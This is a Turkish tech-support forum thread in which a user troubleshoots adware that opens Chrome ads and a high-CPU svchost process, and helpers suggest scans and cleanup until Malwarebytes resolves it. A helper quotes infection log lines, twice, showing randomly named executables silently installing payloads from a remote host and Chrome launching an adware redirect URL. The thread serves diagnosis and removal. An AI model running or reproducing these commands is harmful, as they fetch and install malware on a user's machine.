Chrome Adware Yüksek CPU Kullanımı

OuzKaan

Megapat
Katılım
1 Mayıs 2015
Mesajlar
297
Daha fazla  
Cinsiyet
Erkek
Ne zaman oldu tam hatırlamıyorum ama sanırım 2-3 gündür Chrome kapalıyken durduk yerde reklam açılıyor. Çok sık olmuyor fakat bunun yanında görev yöneticisinde bir uygulama açık , genelde hizmetlerin üzerinde çıkan dişli işareti var ama ismi yok. %64 CPU kullanıyor. Aynısından bir tane de altında var fakat o sadece bellekten 1.4 mb yiyor. GetSystemInfo linkini bıraktım. Umarım format vs. girmeden hallederiz yedekleme için çok ayrıntılı uğraşmam gerekiyor.

GetSystemInfo : GSI6_DESKTOP-SBO618D_Hasan_06_05_2018_17_09_49.zip - Shared with pCloud
 
Son düzenleyen: Moderatör:
Programı kurup direk bir tarama yaptım bulduğu her şeyi temizleyip yeniden başlattım reklam sorunu geçti mi bilmiyorum fakat görev yöneticisindeki işlemci kullanan işlem hala duruyor.
İmzamdan rapor 2 de paylaşın hepsini inceleyelim.
Programı kurup tarama yapmıştım fakat iki dosya buldu trainer tarzı uygulamalardı. Kaldırdım hepsini ama daha sağlıklı olsun diye tekrar tarama yapmam gerektiğini söyledi. Yaptım fakat başka bir şey bulamadı yapmam gerekenler bu kadar değil mi?
Reklam sorunu devam ediyor.
 
Son düzenleyen: Moderatör:
Program listenizde bilmediğiniz uygulama varsa kaldırın, özellikle IOBit programları varsa onları hemen def edin.
Programlarda sorun göremedim herhangi bir IOBit uygulaması da yok. Görev yöneticisindeki işlemi bir şekilde takip edemez miyim? svchost olarak gözüküyor.
Ayrıca arada bir reklam açılınca görev yöneticisinde o işlem tekrar geliyor. Görevi sonlandır diyince gidiyor o açıdan görünür bir problem yok ama görevi sonlandırmazsam internet, oyunlar vs kapanıyor direk.
 
İlginçtir ki sistemde anormal çalışan bir şey görmedim. Aşağıdakileri yapın sorun çözülmezse geri dönüş yapın.

Temiz önyükleme yapın ve şu programları kaldırın:

ph - 1.0.0
bl - 1.0.0

Temp klasörünün içerisini temizleyin ve Zemana AntiMalware ile sistemi taratın.
 
İlginçtir ki sistemde anormal çalışan bir şey görmedim. Aşağıdakileri yapın sorun çözülmezse geri dönüş yapın.

Temiz önyükleme yapın ve şu programları kaldırın:

ph - 1.0.0
bl - 1.0.0

Temp klasörünün içerisini temizleyin ve Zemana AntiMalware ile sistemi taratın.
Dediklerinizi yapacağım şimdi fakat programları kaldırma kısmını anlamadım. Nereden kaldırmam gerekiyor? ve isimleri mi bu pek anlayamadım.
Zemana ile ilk taradığımda sadece bir adware bulmuştu onu temizledim ama sorun devam ediyordu. Bir daha taradığımda görev yöneticisinde işlem devam ediyordu kapatmamıştım. Bu şekilde taratınca haliyle 2 tane svchost.exe yi zararlı süreç olarak algıladı. Varsayılan olarak onarıyor fakat 2 kere bu şekilde onarmaya çalıştım fakat işlemler devam ediyor. Onarmak yerine bu iki svchost.exe yi direk silmeli miyim?
İlginçtir ki sistemde anormal çalışan bir şey görmedim. Aşağıdakileri yapın sorun çözülmezse geri dönüş yapın.

Temiz önyükleme yapın ve şu programları kaldırın:

ph - 1.0.0
bl - 1.0.0

Temp klasörünün içerisini temizleyin ve Zemana AntiMalware ile sistemi taratın.
Sil derseniz eğer sileceğim sorun devam ediyor çünkü. Ayrıca temiz önyüklemeden sonra işlemci kullanımı biraz yükseldi gibi geldi ama sanırım normal. Dediğim gibi sorun devam ediyor eğer sil derseniz sileceğim cevabınızı bekliyorum.
@24099 hocam hala mesajınızı bekliyorum :D sorun dediğim gibi devam ediyor sil derseniz sileceğim Zemana ile.
 
Son düzenleme:
C:\Users\Hasan\AppData\Roaming\Mozilla\Firefox\Profiles\r4cvvz9o.default\prefs.js"

5.06.2018 17:21:18 WARNING An exception skipped: System.UnauthorizedAccessException: 'C:\Program Files\windows nt\Donatılar' yoluna erişim reddedildi.


C:\Users\Hasan\AppData\Local\IWsyEuVHAxy.exe" /q /i http://secproof.net/tyj3xbmosvfm.aau

"C:\Windows\SysWOW64\oHOIoiqxkqC.exe" /q /i http://secproof.net/iasidhrykbez.xhi
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Redirect
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" http://net2018.net/cl/?guid=fe5x7p00aqzqiqhjuqakghldjfetbywh&prid=1&pid=4_1324_0

1001
LISTENING
0.0.0.0
0
System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64
Trojan Silencer,WebEx
===================================================

Loglara çok detaylı bakmadım ama ilk gördüklerim yukarıdaki gibi. Konu ilerlemiyorsa yardımcı olabilirim.
 
C:\Users\Hasan\AppData\Roaming\Mozilla\Firefox\Profiles\r4cvvz9o.default\prefs.js"

5.06.2018 17:21:18 WARNING An exception skipped: System.UnauthorizedAccessException: 'C:\Program Files\windows nt\Donatılar' yoluna erişim reddedildi.


C:\Users\Hasan\AppData\Local\IWsyEuVHAxy.exe" /q /i http://secproof.net/tyj3xbmosvfm.aau

"C:\Windows\SysWOW64\oHOIoiqxkqC.exe" /q /i http://secproof.net/iasidhrykbez.xhi
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Redirect
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" http://net2018.net/cl/?guid=fe5x7p00aqzqiqhjuqakghldjfetbywh&prid=1&pid=4_1324_0

1001
LISTENING
0.0.0.0
0
System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64
Trojan Silencer,WebEx
===================================================

Loglara çok detaylı bakmadım ama ilk gördüklerim yukarıdaki gibi. Konu ilerlemiyorsa yardımcı olabilirim.
Cevabınız için teşekkürler. Sorunu hallettim aslında fakat buraya yazmadım. Sanırım cevap beklerken fazlasıyla unutmuşum konuyu :) . Malwarebytes sağ olsun tek taramayla halloldu sorun. Yardımınız için çok teşekkürler.
 
Uyarı! Bu konu 8 yıl önce açıldı.
Muhtemelen daha fazla tartışma gerekli değildir ki bu durumda yeni bir konu başlatmayı öneririz. Eğer yine de cevabınızın gerekli olduğunu düşünüyorsanız buna rağmen cevap verebilirsiniz.

Bu konuyu görüntüleyen kullanıcılar

Technopat Haberler

Yeni konular

Geri
Yukarı